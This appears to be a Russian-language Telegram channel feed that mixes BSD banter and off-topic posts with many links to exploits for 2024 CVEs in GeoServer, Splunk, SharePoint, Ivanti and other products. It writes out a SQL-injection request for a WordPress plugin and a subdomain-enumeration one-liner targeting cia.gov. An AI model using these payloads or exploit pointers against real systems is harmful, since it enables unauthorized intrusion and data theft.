FreeBSD это вам не просто OS, это круто и стильно, а те кто вам говорит что там нет docker, просто не умеет в jail\зонирование и вот это вот все.
Кто написал всем известный OpenSSH ? хакеры из OpenBSD !
Почему в BSD нет прогремевшей CVE-2024-6387 ? glib да, но может там стабильность любят )))
*
Не для кого не секрет, что доля рынка BSD, за последние 15 лет серьезно упала,
*
НО списывать рано.
*
Во славу систем журнал читать тут

FreeBSD #OpenBSD #NetBSD #dragonFlyBSD #тычиBSD

eBPF rootkit memory forensics
*
link

1 миллион дорков
*
download

CVE-2024-36401
*
RCE GeoServer
*
exploit

CVE-2024-36991
*
Splunk /etc/passwd
*
exploit

главное что быстро, однострочник
*

curl -s 'https://crt.sh/?q=cia.gov&output=json' --compressed -H 'User-Agent: Mozilla/5.0'|jq -r '.[].common_name,.[].name_value'|sort -u

HEVD Exploit Windows 10 22H2
*
LPE exploit

CVE-2024-5009
*
Progress WhatsUp Gold SetAdminPassword Privilege Escalation
*
POC

CVE-2024-38094 / CVE-2024-38024 / CVE-2024-38023
*
Microsoft SharePoint RCE
*
VIDEO
*
POC exploit

СVE-2024-37081 VMware vCenter
*
Уязвимость в неправильной конфигурацией /etc/sudoers, позволяет сохранять опасные переменные среды при выполнении команд sudo.
*
POC exploit

#vmware

MSSQL ATTACK TOOL - pentesting MSSQL servers
*
writeUP
*
download

#tools #mssql

Самый серьезный российский хакер bratva известный своими комментариями про киберпреступления(например LockBit ransomware: операция Cronos, его постили даже западные СМИ) поделился каналом про кибербезопасность который он читает с удовольствием:
https://news.1rj.ru/str/knightpentest

CVE-2024-39202 D-Link DIR-823X
*
RCE
*
writeup
*
POC exploit

По поводу youtube
*
Пошел проверять, 4К прекрасно гоняется без тормозов.
Я и не сразу то понял почему 👌
Ну если по офф версии на территории РФ стоит старое оборудование google
которое не обновляется, а трафф вырос.
Что мешает обходиться это узкое место ?
Ответ: ничего.
Поставьте себе vpn (только не быдло wireguard и даже не православный openvpn, а что то современное, типа xtls). клиенты есть под любую платформу: unix/linux/windows/android/apple
И будет вам счастье.
Бонус трэк: конспирологическая версия
Подумалось, тут же наши выкатили аналог тытрубы - "Платформа", но нас уже палкой от youtube отгонишь, вот и зарезали траффик )))

Exploiting Enterprise Backup Software For Privilege Escalation
*
часть первая
часть вторая
*

#LPE #interprise #research

Просыпаемся, завтракаем
*
CVE-2024-5522 WordPress HTML5 Video Player SQLi
*
usage:

GET  /wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -

CVE-2024-34102
*
Adobe Commerce
Версии: 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8
XXE vuln
*
Exploit

pdf exploit
*
Создать свой

#CVE-2024-4367 #pdf

CVE-2024-29824
*
Ivanti EPM - Remote Code Execution
*
Mass exploit

Viva España
2:1
Прекрасный матч !!!

CVE-2024-41003
*
Linux Kernel: Vulnerability in the eBPF verifier register limit tracking

#kernel